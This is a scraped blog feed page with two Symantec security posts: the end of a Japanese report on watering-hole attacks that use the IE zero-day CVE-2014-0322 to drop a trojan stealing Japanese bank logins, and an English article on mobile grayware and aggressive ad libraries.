  • 出会い系アダルトサイト
  • 言語教育を推進するサイト
  • 金融市場の情報を提供する Web サイト
  • オンラインショッピングサイト
  • 日本の旅行代理店の Web サイト

攻撃に使われているコンポーネントから判断すると、ほとんどの攻撃は同一の攻撃者が仕掛けたものと考えられます。

IE 10 zero day 2 edit.png

図 2. CVE-2014-0322 悪用コードの標的になったコンピュータの地域分布

これらの Web サイトは、Internet Explorer のゼロデイ脆弱性に対する悪用コードをホストするように改ざんされたか、悪用コードをホストしている別の侵入先サイトにリダイレクトする iframe が挿入されて更新されていました。攻撃に成功すると、悪用コードによって、オンラインバンキングを狙うトロイの木馬が投下され、これがみずほ銀行とゆうちょ銀行のログイン情報を盗み出そうとします。シマンテックは、この脅威を Infostealer.Bankeiyaとして検出します。

IE 10 zero day 3.png

図 3.トロイの木馬が表示する、みずほ銀行の偽の画面(ログイン後)

 

yuucho.png

図 4.トロイの木馬が表示する、ゆうちょ銀行の偽の画面(ログイン後)

 

今回の攻撃への対応策

この脆弱性を修正するセキュリティ更新プログラムはまだ提供されていませんが、Microsoft 社は、この脆弱性を悪用する攻撃からコンピュータを保護するために、以下の対応策を推奨しています。

また、関連するパッチが公開され次第、速やかに適用することもお勧めします。シマンテック製品をお使いのお客様は、以下の検出定義によってこの攻撃から保護されています。

ウイルス対策

侵入防止シグネチャ

この脆弱性を悪用する攻撃は今後も増加傾向が続くと予測されるため、ただちに対策を実施するようにしてください。

 

* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/jaにアクセスしてください。

Grayware: Casting a Shadow over the Mobile Software Marketplace

0
0
3442719_-_mobile_device_grayware_concept.png
One of the most problematic areas in mobile security today is “grayware.” The dividing line between legitimate software and malware is not clearly drawn and grayware often occupies this murky middle ground. Grayware is applications that may not have any recognizable malware concealed within them but can nevertheless be in some way harmful or annoying to the user. For example, it might track their location, Web browsing habits or serve up unwanted ads. In many cases, grayware authors often maintain a veneer of legitimacy by outlining the application’s capabilities in the small print of the software license agreement. 
 
Grayware is not a new phenomenon and it first began to attract attention well over a decade ago when unwanted extras, such as spyware, were often packaged with free applications. As PC users became more savvy and aware of what they install, the controversy died down. However, the arrival of the new generation of smartphones has created a brand new software market. Consumers are prone to treat the mobile software market with the same degree of naivety that they may have treated the desktop space ten or fifteen years ago. Mobile apps are often installed with little or no consideration of what they may be capable of.
 
How big is the problem? Data collected by Symantec suggests that over a third of all mobile apps can be regarded as grayware. By the time the new version of Norton Mobile Security launched last year, Norton Mobile Insight, Symantec’s app analysis tool, had analyzed more than four million apps and found that 1.5 million could be classed as grayware. This compares to 300,000 apps that were classed as malware. 
 
Grayware can be anything from an app that plays fast and loose with the user’s privacy to something far more elaborate. For example, Symantec recently discovered a grayware app that encouraged Instagram users to share their usernames and passwords in order to increase likes and followers. The app, known as InstLike, was for a time available on the Apple App Store and the Google Play Store, but both companies have since removed it. 
 
The app claimed that it could provide people with followers and likes for free. However, it demanded a user’s login credentials for Instagram. The app was then given significant control of a user’s Instagram account, automatically liking photos without any user interaction.
 
One class of mobile grayware that has grown in recent years is what’s known as “madware.” This refers to apps that use aggressive ad libraries. An ad library is a component of an app that can collect information about the user for the purposes of displaying targeted advertising. It is a common feature of free apps, which usually rely on advertising for revenue. However, some ad libraries adopt aggressive tactics, such as leaking personal information, displaying ads in the notification bar, creating icons for ads or changing bookmarks. 
 
Recent research by Symantec found that of the 65 known ad libraries, over 50 percent can be classified as madware. The percentage of apps that utilize madware has risen steadily. For example, 23 percent of apps on the Google Play store last year can be considered as madware, up from less than 5 percent in 2010. 
 
What can be done about grayware? Because it doesn’t cross the bounds of illegality, antivirus firms usually can’t block it. Occasionally it is removed from official mobile marketplaces such as the Apple App Store or Google Play because it violates terms and conditions. 
 
Knowledge is the best defense. In the same way that PC users are now a little bit more wary about what they install on their computers, smartphone users should take a moment to consider what they’re downloading and look into what permissions the app is seeking. 
 
There are also a number of tools you can use to help identify which apps may be taking liberties with your smartphone. For example, Norton Spot will scan your Android phone for aggressive ad libraries that may spam your device and identify the apps associated with them. 
Viewing all 5094 articles
Browse latest View live




Latest Images